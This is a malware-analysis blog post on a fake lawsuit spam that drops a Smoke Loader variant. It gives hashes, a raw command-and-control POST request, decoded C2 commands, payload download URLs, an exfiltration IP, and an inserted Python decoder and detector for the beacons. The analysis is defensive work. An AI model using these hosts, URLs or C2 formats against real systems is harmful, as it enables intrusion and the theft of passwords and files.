Court Notification

On 2012-03-29 via Cisco’s Security Intelligence Operations, we observed an interesting spam sample with the subject line “Court is aCourt notification”. This spam sample had the following body text:

Notice!

The company “New Balance” has sued you for sending spam.
A copy of the lawsuit is attached to the letter,

Thank you.
U.S. Legal Support

Oh, the irony! A spam sample threatening legal action in response to … spamming!

Anywho, the observed spam sample contained the following malicious attachment:

File: Lawsuit_From_Legal Support_22nd_of_March.exe
Size: 58368
MD5: FC1DCCE6644E425C7C68CCCCBAFCE8B6

This sample installed itself in the following location C:\Documents and Settings\Administrator\Application Data\A11519.exe.

When executed in a lab environment this sample initiated a connectivity check to http://www.google.com. The sample then connected to a command and control server at beaufortseaa139.ru via the following POST request:

POST /qad/index.php HTTP/1.0
User-Agent: Mozilla/4.0
Host: beaufortseaa139.ru
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 20

smk=AmFvZj9lZ3ZlcGNg

This POST request mirrors the traffic pattern seen in our earlier blog post, American Airlines Ticket Attachment. That’s right, this sample is indeed another Smoke Loader variant. Our friends over at the Tracking Cybercrime blog have a good blog post detailing how Smoke Loader is marketed and sold in the underground.

Smoke Loader samples are clearly identifiable by the ‘smk=’ string observed in the POST data sent to the command and control server. The above POST data smk=AmFvZj9lZ3ZlcGNg is clearly encoded. As established in our earlier blog post, this data can be decoded via a two-step process. First the data must be base64 decoded. This step gives us the following output:

AmFvZj9lZ3ZlcGNg >> base64 decodes to >> .aof?egvepc`.

Now, if we take the hex output of our base64 decoding operation we get a result of 02616F663F65677665706360.

Note that the first character of the text output of the decoding operation is shown as ‘.’, which is how a non-printable byte, here a null character, is rendered. A null character in hex should be ‘00’. As the first byte of our hex output is instead ‘02’, the null has evidently been XORed with a single-byte key (0x00 XOR key = key), so we can assume that a simple XOR decoding operation with the key 0x02 should reveal the plaintext POST data.

02616F663F65677665706360 >> 0x02 XOR decodes to >> cmd=getgrab

The POST request returns the following encoded file with the following properties:

File: 198
Size: 436228
MD5: ED113B12304243E7F532B370548A2D1C

This encoded file is a grabber designed to steal passwords from various FTP, instant messaging, mail, and web browser applications.

This Smoke Loader variant then sends the following data via a POST request to beaufortseaa139.ru/qad/index.php

smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9DQzE1MTtAQUZHM0A0RzQzMzYxOzU7NUBDMjE3OzExMUNAQzMzNzM7JHJtcHY/MTM7OzU=

Using the same process detailed above we see that this string decodes to:

.cmd=getsocks&login=AA3739BCDE1B6E611439797BA0359333ABA11519&port=31997

This command downloads a SOCKS proxy.

The next POST to beaufortseaa139.ru/qad/index.php includes the following string:

smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0NDMTUxO0BBRkczQDRHNDMzNjE7NTs1QEMyMTc7MTExQ0BDMzM3MzskcWduPzA6b2MkdGdwPzcsMyRga3ZxPzI=

This decodes to:

.cmd=getload&login=AA3739BCDE1B6E611439797BA0359333ABA11519&sel=28ma&ver=5.1&bits=0

The ‘getload’ command asks the control server how many secondary payloads it should download. The ‘login’ parameter appears to be a unique identifier specific to the particular victim. The ‘sel’ parameter appears to be an identifier for the particular Smoke Loader campaign associated with this spam campaign. The ‘28ma’ string likely represents the date of March 28. The ‘ver’ parameter appears to identify the OS of the infected victim.
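The two-step decoding described above (base64, then single-byte XOR with a key recovered from the leading null byte) is mechanical enough to script. The following Python is an added example, not code from the original post or from Cisco; it decodes the three smk= bodies quoted above (embedded here as constructed sample input), splits the plaintext into the cmd/login/sel/ver/bits fields, and adds one generalisation the post does not need: if the first-byte shortcut does not produce the expected ‘cmd=’ prefix, it tries all 256 single-byte keys before giving up. The function names (recover_key, decode_smk, parse_beacon, is_smoke_loader_beacon) are this example’s own.

```python
import base64
from urllib.parse import parse_qs

# Constructed input: the three smk= POST bodies quoted in the post above.
SAMPLE_BEACONS = [
    "smk=AmFvZj9lZ3ZlcGNg",
    "smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9DQzE1MTtAQUZHM0A0RzQzMzYxOzU7NUBDMjE3OzExMUNAQzMzNzM7JHJtcHY/MTM7OzU=",
    "smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0NDMTUxO0BBRkczQDRHNDMzNjE7NTs1QEMyMTc7MTExQ0BDMzM3MzskcWduPzA6b2MkdGdwPzcsMyRga3ZxPzI=",
]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def recover_key(blob: bytes) -> int:
    """Return the single-byte XOR key for a base64-decoded smk= blob.

    The plaintext seen in the post begins with a null byte followed by
    'cmd=', so the first ciphertext byte is 0x00 ^ key == key.  That
    shortcut is tried first and verified; if it fails (hypothetical variant
    with a different layout), every other key is tried and the one that
    yields a 'cmd=' prefix (with or without the leading null) is returned.
    """
    if not blob:
        raise ValueError("empty blob")
    candidates = [blob[0]] + [k for k in range(256) if k != blob[0]]
    for key in candidates:
        head = xor_bytes(blob[:5], key)
        if head.startswith(b"\x00cmd=") or head.startswith(b"cmd="):
            return key
    raise ValueError("no single-byte XOR key yields a 'cmd=' prefix")


def decode_smk(value: str) -> str:
    """Base64-decode, XOR with the recovered key, drop the leading null."""
    blob = base64.b64decode(value)
    plain = xor_bytes(blob, recover_key(blob))
    if plain.startswith(b"\x00"):
        plain = plain[1:]
    return plain.decode("ascii")


def parse_beacon(body: str) -> dict:
    """Turn a POST body 'smk=<base64>' into a dict of decoded C2 fields."""
    if not body.startswith("smk="):
        raise ValueError("not an smk= body")
    plain = decode_smk(body[len("smk="):])
    fields = parse_qs(plain, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def is_smoke_loader_beacon(body: str) -> bool:
    """Detection helper for proxy/IDS logs: True only when the body decodes
    cleanly to a 'cmd=' command string, not merely when it starts with smk=."""
    try:
        return body.startswith("smk=") and "cmd" in parse_beacon(body)
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return False


if __name__ == "__main__":
    for body in SAMPLE_BEACONS:
        print(body[:24] + "...", "->", parse_beacon(body))
```

The raw bodies in the post carry the base64 ‘/’ and ‘=’ characters unescaped; a body captured from a real form-encoded request may have them percent-encoded, in which case run urllib.parse.unquote over the value before calling parse_beacon. Because the key check demands the ‘cmd=’ prefix, is_smoke_loader_beacon will not fire on unrelated form posts that happen to use an smk field.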

The command and control server at beaufortseaa139.ru returns the response ‘Smk4’, indicating that the victim should download 4 additional files.

The victim then downloads the following files:

http://www.theoldpalmerhouse.com/orderspro/template/images/1.exe
Size: 317952
MD5: 0CAE2FE5AF5AB63A62DD7A2C9E676C5C

http://www.theoldpalmerhouse.com/orderspro/template/images/doc.exe
Size: 599040
MD5: 709CC1AC4D7743E20BB3FB73E7475A78

http://www.maliks.com/images/1.exe
Size: 317952
MD5: 0CAE2FE5AF5AB63A62DD7A2C9E676C5C

http://www.maliks.com/images/doc.exe
Size: 599040
MD5: 709CC1AC4D7743E20BB3FB73E7475A78

Note that the files hosted at theoldpalmerhouse.com and maliks.com are identical. This duplication of effort is likely carried out to increase the chances that these secondary payloads are successfully installed.

The payload doc.exe is a doc stealer. It harvests the victim machine for .doc and .xls files. Stolen files are exfiltrated to 91.201.4.62 over port 8000. This is the same IP used in the American Airlines Ticket Attachment post.

One Comment

  1. Brynn Hatmaker
    Posted April 16, 2012 at 9:42 pm

    Say, you got a nice article post. Awesome.